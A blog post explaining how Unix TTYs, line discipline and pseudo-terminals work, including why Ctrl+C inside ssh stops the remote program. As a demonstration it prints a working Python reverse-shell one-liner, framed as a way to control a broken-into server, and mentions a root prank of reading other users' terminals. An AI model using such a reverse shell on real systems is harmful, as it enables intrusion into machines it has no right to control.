Let’s start with an interview question. The terminal has some common shortcuts: Ctrl+E moves to the end of the line, Ctrl+W deletes a word, Ctrl+B moves back one character, and the up arrow brings up the last shell command used. One of these four shortcuts is implemented differently from the others. Which one is it?

The answer is Ctrl+W, because Ctrl+W is provided by something called the TTY, while the other three are provided by the shell. Okay, I admit that I might get beaten up for asking someone such a question, but here it is just to catch the reader’s interest.

Let’s look at another interesting question: suppose you are on host1, log into host2 with the ssh command, and then run sleep 9999. What happens when you press Ctrl+C at this point?

  1. ssh on host1 will be stopped
  2. the sleep command on host2 will be stopped and the ssh session will remain

Anyone who has used ssh knows that the answer is (2): we can press Ctrl+C inside the shell provided by ssh without any effect on ssh itself.

So how does this work?

We know that Ctrl+C sends a signal with an int value of 2, called SIGINT. So we can guess: is it possible that the ssh process received the SIGINT and forwarded it to the ssh remote program, but won’t handle the signal itself?

We can verify this conjecture using the killsnoop program, which prints out the signals between processes.

First we start the killsnoop program.

root@vagrant:/home/vagrant# ./perf-tools/killsnoop
Tracing kill()s. Ctrl-C to end.
COMM             PID    TPID     SIGNAL     RETURN

Then open a new shell, press Ctrl+C and you will see that the shell (pid=1549) received signal=2, i.e. SIGINT.

vagrant@vagrant:~$ ps
    PID TTY          TIME CMD
   1549 pts/1    00:00:00 bash
   1644 pts/1    00:00:00 ps
vagrant@vagrant:~$ ^C
root@vagrant:/home/vagrant# ./perf-tools/killsnoop
Tracing kill()s. Ctrl-C to end.
COMM             PID    TPID     SIGNAL     RETURN
bash             1549   1549     2          0

Then we ssh to the local machine and press Ctrl+C inside ssh :

vagrant@vagrant:~$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
 
vagrant@vagrant:~$ ^C

If our guess is correct, the shell (pid=1549) should still be receiving SIGINT and forwarding it to the ssh process.

But killsnoop shows that only the shell opened by ssh received SIGINT; the ssh process itself and the original shell (pid=1549) received nothing.

systemd-udevd    392    1653     15         0
systemd-udevd    392    1664     15         0
bash             1689   1689     2          0

Obviously, our conjecture is not valid. So how is it possible that Ctrl+C does not affect ssh itself but affects the programs inside ssh? I believe that you will have an answer after reading this article.

Hopefully that is enough to spark some interest in TTY, so let’s start the archaeology.

TTY is a product of history

The first thing to be clear about is that TTY is a historical artifact, much like the many /bin directories on Unix systems today. They exist because older programs need them in order to run, and newer programs stay compatible with them by default. If you designed a terminal or a directory layout from scratch, with no regard for history and compatibility, you would not need so many /bin directories, and you would not need TTYs.

Here’s a brief history of the time when TTY was needed and why it was indispensable in that case, along with the various subcomponents.

TTY is short for Teletype. So what is a Teletype?

Teletype

This, then, is Teletype.

This video shows how it works.

There is also a Twitter account called Teletype Model 33 that posts related content, such as this git push video on Teletype.

Simply put, a long time ago many people shared one computer (you’ve heard that Unix is a multi-user, multi-tasking operating system, right?). Everyone had a “terminal” (which is what TTY means in this context). You typed the command you wanted to run, the terminal sent it to the system for execution, received the result from the system, and printed it on paper.

So, at the time, TTY was a piece of hardware, and as a piece of hardware, how was it connected to the computer?

First there is a wire, but this wire is not connected directly to the computer. It goes to a piece of hardware called a Universal Asynchronous Receiver and Transmitter (UART). The UART driver reads the data from the hardware and passes it to the TTY driver, which in turn passes it to the program. (In fact, UARTs are still in use today, so if you’ve played with an Arduino or a Raspberry Pi, you may have come across them.)

Something like this.

TTY

Up to this point, it’s actually relatively straightforward for us “modern people”. The input from the hardware is copied through the Driver layer by layer to the application.

Wait, there is something called “Line discipline” on top. What the hell is that?

As its name says, it is used to “discipline” the line. After a command is typed and before the Enter key is pressed, it is held in a buffer inside the TTY, and a line sitting in that buffer can be “disciplined” by Line discipline. For example, it provides delete-line via Ctrl+U: after you press Ctrl+U, the TTY does not send that character to the program behind it, but deletes the whole line in the current buffer instead. Similarly, deleting a word with Ctrl+W is a feature provided by Line discipline. (Wow! Now you pass my interview!) I’ll prove later that this is a TTY feature.
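The editing behavior described above can be observed without a keyboard. The following is a minimal sketch, assuming Linux and Python’s standard pty and termios modules; the helper name type_into_cooked_tty is made up for illustration. It plays the role of the keyboard on one end of a scratch pseudo-terminal and of the program on the other end, so whatever editing happens in between is done by the kernel, not by any shell.

```python
import os
import pty
import termios


def type_into_cooked_tty(keystrokes):
    """Feed keystrokes to a scratch PTY and return the line a program would read."""
    master_fd, slave_fd = pty.openpty()
    try:
        # Make the cooked-mode settings explicit instead of relying on defaults.
        attrs = termios.tcgetattr(slave_fd)
        attrs[3] |= termios.ICANON | termios.IEXTEN  # lflag: line editing on
        attrs[6][termios.VKILL] = b"\x15"    # Ctrl+U: erase the whole line
        attrs[6][termios.VWERASE] = b"\x17"  # Ctrl+W: erase the previous word
        termios.tcsetattr(slave_fd, termios.TCSANOW, attrs)

        os.write(master_fd, keystrokes)  # what the "keyboard" sends
        return os.read(slave_fd, 1024)   # what the "program" receives
    finally:
        os.close(master_fd)
        os.close(slave_fd)


if __name__ == "__main__":
    print(type_into_cooked_tty(b"hello world\x17there\n"))
    print(type_into_cooked_tty(b"oops\x15ls\n"))
```

The reader on the program side only ever sees the finished line: the Ctrl+W and Ctrl+U bytes, and the text they erased, never arrive.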

This function is simply too boring for us “modern” people. Can’t we just leave it to bash? Is it necessary to handle such things as a subsystem of the Kernel?

Whenever you want to criticize someone, remember that not all people in this world have the same advantages you have.

Yes, back in the days of Unix, there was no such condition.

A long time ago, it was too expensive for a computer to read every character and send it immediately to the program behind the terminal. If 20 people were typing at 60 words per minute, that would mean about 100 context switches and disk swaps per second, so the computer would spend 100% of its time processing keystrokes and would have no time for anything else. (PS: I learned this from a comment on dev.to, and it is really wonderful. I had read a lot of articles before seeing that comment, and none of them made me understand why Line discipline was needed.)

The biggest use of Line discipline is really as a programmable middleman. It buffers what is typed on each of the 20 TTYs and only sends a line on to the back-end program when that user presses Enter. If each user needs about 30 s to enter a command, the system receives one line roughly every 1.5 s instead of 100 keystrokes per second. That is on the order of 100 times less work.
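The arithmetic behind these figures can be written out as a small sketch. The 5 characters per word is an assumption (a common typing-speed convention, not something stated in the comment), and the function name is hypothetical.

```python
def wakeups_per_second(users, words_per_minute, chars_per_word, seconds_per_command):
    """Compare per-keystroke delivery with per-line delivery."""
    # Every keystroke wakes the program up.
    per_keystroke = users * words_per_minute * chars_per_word / 60
    # Only a finished line wakes the program up.
    per_line = users / seconds_per_command
    return per_keystroke, per_line


if __name__ == "__main__":
    per_keystroke, per_line = wakeups_per_second(20, 60, 5, 30)
    print("keystrokes per second:", per_keystroke)
    print("seconds between lines:", 1 / per_line)
    print("reduction factor:", per_keystroke / per_line)
```

With these inputs the per-keystroke rate is 100 per second and a finished line arrives every 1.5 seconds, a reduction of about 150 times, which is in line with the rough hundredfold figure above.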

Line discipline works a bit like Emacs: it has a function table of size 127, and each key is bound to a function, for example “put the character in the buffer” or “send the command out”.

You can set the TTY to raw mode, so that Line discipline does not interpret the characters it receives but sends them directly to the program behind it (the foreground process group of the session, to be exact). In fact, this is the reason why ssh does not receive SIGINT but the program inside ssh does, as I’ll show later. Nowadays, many programs put the TTY in raw mode, such as ssh and Vim. But a long time ago, Vim ran in cooked mode (i.e., with Line discipline active). When you typed some text in the middle of a line, like asdffwefs, the screen would go haywire and the text would overwrite what came after it until you pressed Esc to exit editing.
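Raw mode can be sketched the same way, assuming Linux and Python’s standard pty and tty modules (the helper name type_into_raw_tty is made up). Here tty.setraw switches off line editing, echo, and the signal keys on a scratch pseudo-terminal, and the bytes sent by the “keyboard” are then read back on the program side.

```python
import os
import pty
import tty


def type_into_raw_tty(keystrokes):
    """Feed keystrokes to a scratch PTY in raw mode and return what a program reads."""
    master_fd, slave_fd = pty.openpty()
    try:
        tty.setraw(slave_fd)  # no line editing, no echo, no signal keys
        os.write(master_fd, keystrokes)
        received = b""
        # Raw reads may return as soon as one byte is available, so collect
        # until everything that was "typed" has arrived.
        while len(received) < len(keystrokes):
            received += os.read(slave_fd, 1024)
        return received
    finally:
        os.close(master_fd)
        os.close(slave_fd)


if __name__ == "__main__":
    # Ctrl+W (0x17) and Ctrl+C (0x03) arrive as ordinary bytes, with no Enter needed.
    print(type_into_raw_tty(b"ab\x17\x03\r"))
```

Nothing is erased and nothing waits for Enter: a program such as an editor receives every key immediately and decides for itself what each one means.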

Today’s computers have become a million times more powerful than the hardware of that time, so Line discipline has little meaning. But at that time, if one wanted to delete and edit the currently typed command, where was the most appropriate place to implement this function? Obviously the buffer!

The performance issues here are history, but TTY and Line discipline are here to stay because (I’m guessing) many programs are written with TTY by default, such as bash, and TTY continues to retain Line discipline without the user feeling anything about it.

So what exactly is a TTY today? Essentially, it is no longer a piece of hardware, but just a piece of software (kernel subsystem). At the user level of the system, it is - a file. Of course, what is not a file in Unix?

The tty command allows you to see which TTY is used by the current shell.

As a “file”, you can write to it directly. Whatever is written to the TTY is read out by the output device. (The image below shows text written from the lower shell appearing in the upper shell.)

tty

Of course, it’s possible to read. But when you read from the TTY, you are in competition with the output device, because you are both trying to read from this TTY, which had only one reader, and now has two. I pressed the numbers 1-9 in the shell above, and each time I entered a number I wasn’t sure which side it would be read from.

tty

Once it is read by cat, the key you pressed will not be displayed in the current shell.

Got a bad, bad idea? Yes, we can use the w command to see who is logged in to the machine, then cat their TTY, and they will surely think their keyboard is broken! (Tip: when a user logs in, the TTY file is owned by that user and is readable and writable only by them, so you have to be root for this prank to work!)

tty

Having understood what TTY is, what is it good for today?

We can think about this question in reverse: Can we do without TTY?

The answer is yes.

I can demonstrate that you can use the terminal without TTY.

Imagine a scenario where you break into someone’s machine, such as the server where kawabangga.com is located, and you find a way to execute python code inside it, but you can only inject the code into it and execute it without seeing the output, what do you do?

There is something called a reverse shell. In layman’s terms, ssh normally opens a shell on a remote computer for us to control. A reverse shell, as the name implies, goes the other way: a shell is opened on the remote machine and handed back to us to control.

For the following demonstration, I opened a TCP port with nc in the lower terminal, and then executed the following command in the upper terminal.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python

You can see that this Python code starts an sh process and connects its stdin/stdout/stderr to the TCP socket. On the nc side, nc’s own stdin and stdout are relayed through the socket, so my nc becomes a shell that controls the other side!

This way, I can execute commands on the other side’s host at will, very convenient!

shell

A reverse shell can be opened from other languages as well.

As you can see from the image above, this is a shell without a TTY. What’s wrong with it? Let’s run a TUI program, like htop.

htop

Note the problem in the top left corner: after pressing q, I was actually trying to type hostname, but sh had lost its mind and couldn’t even display the characters I typed properly. In addition, this shell without a TTY has the following disadvantages:

  1. you can’t use TUI programs like Vim, htop, etc.
  2. you can’t use tab completion
  3. you can’t use the up arrow to recall previous commands
  4. there is no job control
  5. ……

(Actually, reverse shell can also have TTY)

So today we can run an incomplete shell without a TTY. After all, our hardware no longer has anything to do with Teletypes.

However, TTY still serves an important function as a kernel module: the terminal can tell the TTY to move the cursor, clear the screen, change the window size, and so on.

Eh? Wait a minute, why does the output of the tty command in the images above start with /dev/pts/ and not /dev/tty? What’s the difference?

This is actually a “pretend” TTY, called Pseudo terminal.

You may have noticed an important point in the discussion above: TTY is a module (subsystem, driver) of the kernel, so it lives in kernel space, not user space. How, then, can our modern terminal programs, ssh, and so on interact with it?

The answer is PTY.

The explanation is simplified here to make it easier to understand. When a program like iTerm2 needs a TTY, it asks the kernel to create a PTY pair for it. Note that it is a pair: PTYs always come in pairs, a master and a slave. The slave is given to the program that runs inside the terminal (as mentioned earlier, programs like bash assume that a TTY exists and use it when interactive). That program does not know whether it has a PTY slave or a real TTY; it just reads and writes. The PTY master is returned to the program that asked for the pair (usually ssh, a graphical terminal emulator, tmux, etc.), which receives it as an fd and can read from and write to it. The kernel is responsible for copying what is written to the master over to the slave, and what is written to the slave over to the master. pts stands for pseudo-terminal slave, which means that the login device of these interactive shells is a pseudo-terminal slave.

terminal emulator - pty master <-- TTY driver( copies stuff from/to) --> pty slave - shell
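The pairing can be tried out with a few lines of Python. This is a minimal sketch, assuming Linux and the standard pty and subprocess modules; run_child_on_pty and CHILD_CODE are hypothetical names. The parent plays the terminal emulator and keeps the master, while a child process gets the slave as its stdin/stdout/stderr and reports which TTY it believes it is attached to.

```python
import os
import pty
import subprocess
import sys

# The child only reports the name of the TTY behind its stdin.
CHILD_CODE = "import os; print(os.ttyname(0))"


def run_child_on_pty():
    """Run a child on the slave end and read its output from the master end."""
    master_fd, slave_fd = pty.openpty()
    try:
        # The child gets the slave as stdin/stdout/stderr, just as a shell would.
        subprocess.run(
            [sys.executable, "-c", CHILD_CODE],
            stdin=slave_fd, stdout=slave_fd, stderr=slave_fd, check=True,
        )
        output = b""
        while not output.endswith(b"\n"):
            output += os.read(master_fd, 1024)  # the "terminal emulator" side
        return os.ttyname(slave_fd), output
    finally:
        os.close(master_fd)
        os.close(slave_fd)


if __name__ == "__main__":
    slave_name, seen_on_master = run_child_on_pty()
    print("slave device:", slave_name)
    print("bytes read from master:", seen_on_master)
```

On Linux the slave name is typically of the form /dev/pts/N, and the bytes read from the master usually end in \r\n rather than \n, because the TTY layer in the middle applies its output processing (onlcr) on the way through.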

So the terminals we see under a GUI, like Xterm or iTerm2 (which actually uses ttyS, so I won’t go into details here), the shells opened in tmux, and the shells opened by ssh are all PTYs. That is why GUI programs such as konsole and Xterm are called “terminal emulators”: they are not real terminals, they emulate one.

How do you get to a real TTY? Simple. On an Ubuntu desktop system, Ctrl+Alt+F1 is the graphical interface, but Ctrl+Alt+F2 (F2 through F6, actually) is a terminal, and that terminal is a TTY. Log in there and run the tty command, and it will tell you that this is a tty device.

I happen to have a VirtualBox virtual machine with only a command line and no GUI. After logging in, you can see that this is a TTY.

tty

Finally, let’s go back to the second question at the beginning of this article: Why does pressing Ctrl+C in ssh not stop ssh, but stops the programs inside ssh?

Let’s review what happened when we pressed Ctrl+C locally.

  1. the kernel driver receives the Ctrl+C input (ignoring any unrelated modules in between).
  2. the input then reaches the TTY, which sends a SIGINT signal to the foreground process group of the TTY (in fact, to the foreground process group of whichever session the TTY is currently assigned to). If bash is currently in the foreground, bash receives the signal; if it is sleep, then sleep receives it.

Since SIGINT is a signal that a program can handle itself, bash decides to ignore it after receiving it, while sleep exits after receiving it.
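What “handled by the program itself” means can be shown with a short sketch, assuming a POSIX system and Python’s standard signal module (the function name is made up, and this is an analogy for what bash does, not its actual code). The process installs its own SIGINT handler, sends itself the same signal that Ctrl+C would produce, and carries on instead of exiting.

```python
import os
import signal
import time


def send_sigint_to_self():
    """Install a SIGINT handler, send SIGINT to this process, and report what arrived."""
    received = []

    def handler(signum, frame):
        # A custom handler replaces the default action of terminating the process.
        received.append(signal.Signals(signum).name)

    previous = signal.signal(signal.SIGINT, handler)
    try:
        os.kill(os.getpid(), signal.SIGINT)  # same signal number as Ctrl+C: 2
        # Give the interpreter a moment to run the handler if it has not yet.
        for _ in range(100):
            if received:
                break
            time.sleep(0.01)
    finally:
        signal.signal(signal.SIGINT, previous)  # put the old behavior back
    return received


if __name__ == "__main__":
    print("still alive after:", send_sigint_to_self())
```

A program that installs no handler, such as sleep, gets the default action and is terminated.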

ssh

The stty program allows us to modify the TTY’s function table. For Ctrl+C, the relevant setting is called isig.

[-] isig

enable interrupt, quit, and suspend special characters

-from man stty

This means that when the TTY receives an input like Ctrl+C (written as ^C; you can check with stty -a that the default quit is ^\ and the default suspend is ^Z), it does not pass the character on to the program behind it, but converts it to SIGINT and sends that to the foreground process group of the current TTY. We can use stty -isig to turn this behavior off.

Now, if you press Ctrl+C in the sleep program, TTY will send the ^C character to the sleep program as is, and sleep will not receive any signal. We can’t use Ctrl+C to end the sleep program.
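The effect of turning isig off can also be reproduced programmatically. Below is a minimal sketch, assuming Linux and Python’s standard pty and termios modules, with a made-up function name. It clears the ISIG flag on a scratch pseudo-terminal, which is intended to mirror what stty -isig does, and then “presses” Ctrl+C followed by Enter.

```python
import os
import pty
import termios


def read_ctrl_c_without_isig():
    """Clear ISIG on a scratch PTY, type Ctrl+C and Enter, return what a program reads."""
    master_fd, slave_fd = pty.openpty()
    try:
        attrs = termios.tcgetattr(slave_fd)
        attrs[3] &= ~termios.ISIG   # lflag: stop turning ^C, ^\ and ^Z into signals
        attrs[3] |= termios.ICANON  # keep line buffering, as a normal shell TTY has
        termios.tcsetattr(slave_fd, termios.TCSANOW, attrs)

        os.write(master_fd, b"\x03\n")  # Ctrl+C, then Enter
        return os.read(slave_fd, 1024)
    finally:
        os.close(master_fd)
        os.close(slave_fd)


if __name__ == "__main__":
    print(read_ctrl_c_without_isig())
```

The 0x03 byte is delivered to the reader as ordinary data, which is what a program behind such a TTY would see instead of a SIGINT.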

Ctrl+C

Back to the ssh problem. Our reasonable guess is that when ssh gets the remote shell, it first disables isig on the TTY of the shell it is running in, so that Ctrl+C reaches ssh as a character. The ssh client sends this character to the remote ssh server, the ssh server writes it to its own TTY (which is actually a PTY master), and finally the remote TTY sends a SIGINT signal to the current remote foreground process.

How can we verify our suspicions?

Verification 1

We can use stty to check the TTY settings of the shell, and then use this shell to log in via ssh and check the TTY settings again.

stty

In this diagram, we use the shell above to view the shell TTY configuration below. You can see that the first view is before the ssh login and isig is on. The second view is after the ssh login, isig becomes off. If ssh logs out, isig becomes on again.

Verification 2

To prove it from the other direction: if we force isig back on for the TTY where ssh is running after the ssh login, then pressing Ctrl+C should end the ssh process itself, not the program running inside ssh.

Since I’m using ssh to log in locally, I’ve changed the command line prompt of the local shell to distinguish between the current local shell and ssh.

ssh

This image was taken after logging in with ssh and running stty --file /dev/pts/0 isig in another shell, which turns isig back on for the TTY of the shell where ssh is running. I then pressed Ctrl+C in ssh (the current foreground program is sleep 9999). At this point ssh exits directly and we are back in the local shell, instead of sleep being ended inside ssh.

Verification 3

We can use the strace program directly to trace the ssh system calls.

strace -o strace.log ssh [email protected]

You can see that when ssh starts, there is a line that says

ioctl(0, SNDCTL_TMR_STOP or TCSETSW, {B9600 -opost -isig -icanon -echo ...}) = 0

is changing the TTY setting to -isig, and some other settings.

Then, when ssh exits, there is a line that says

ioctl(0, SNDCTL_TMR_STOP or TCSETSW, {B9600 opost isig icanon echo ...}) = 0

which changes the settings back.

In fact, if you use terminals enough, you must have run into this situation: some TUI program exits abnormally (for example, it gets stuck, crashes, or receives SIGKILL), and afterwards the terminal is all messed up: Enter does not work, Ctrl+W does not work, and so on. This is probably because the program never ran the code that restores the TTY settings, which it should have run on exit. Use the reset command to reset the current terminal and bring it back to its senses.
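The save, change, and restore pattern that such programs are expected to follow might look like the sketch below. It assumes Linux and Python’s standard termios, tty, and pty modules; raw_mode, isig_enabled, and demo are hypothetical names, and this is not how ssh itself is written.

```python
import contextlib
import os
import pty
import termios
import tty


@contextlib.contextmanager
def raw_mode(fd):
    """Put the TTY behind fd into raw mode and restore the old settings on exit."""
    saved = termios.tcgetattr(fd)
    try:
        tty.setraw(fd)
        yield
    finally:
        # This never runs if the process is killed with SIGKILL, which is one
        # way a terminal ends up needing `reset`.
        termios.tcsetattr(fd, termios.TCSADRAIN, saved)


def isig_enabled(fd):
    """Report whether the TTY behind fd turns ^C into SIGINT."""
    return bool(termios.tcgetattr(fd)[3] & termios.ISIG)


def demo():
    """Return the isig state before, during, and after raw mode on a scratch PTY."""
    master_fd, slave_fd = pty.openpty()
    try:
        attrs = termios.tcgetattr(slave_fd)
        attrs[3] |= termios.ISIG  # start from a known state
        termios.tcsetattr(slave_fd, termios.TCSANOW, attrs)
        before = isig_enabled(slave_fd)
        with raw_mode(slave_fd):
            during = isig_enabled(slave_fd)
        after = isig_enabled(slave_fd)
        return before, during, after
    finally:
        os.close(master_fd)
        os.close(slave_fd)


if __name__ == "__main__":
    print(demo())
```

The restore step lives in a finally block so that ordinary exits and exceptions both put the settings back; only an abrupt kill skips it.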

reset

So back to the first question, how do you prove which shortcuts are provided by TTY and which are provided by the shell?

This is even easier. In fact, stty -a already prints out all the TTY settings:

stty -a
speed 9600 baud; rows 52; columns 187; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = M-^?; eol2 = M-^?; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O;
min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc ixany imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe -echok -echonl -noflsh -xcase -tostop -ech

In raw mode, even Enter is just a line feed: the cursor moves down a line but is not returned to the beginning of the line.

raw mode

If you unbind Ctrl+W, this function is naturally gone: typing Ctrl+W really produces a ^W.

Ctrl+W

What about the shell shortcuts (like Ctrl+E)? We can use the sh program to verify that they are provided by the shell, not by TTY. sh is a very simple-minded program and does not interpret Ctrl+A or the arrow keys: pressing the left arrow produces ^[[D and pressing Ctrl+A produces ^A (many people have probably seen these characters before: when the shell is stuck, pressing an arrow key puts these raw characters on the screen). However, under a normal TTY (a cooked TTY; you can use the reset command to restore the TTY we played with before), Ctrl+W still works under sh.

ssh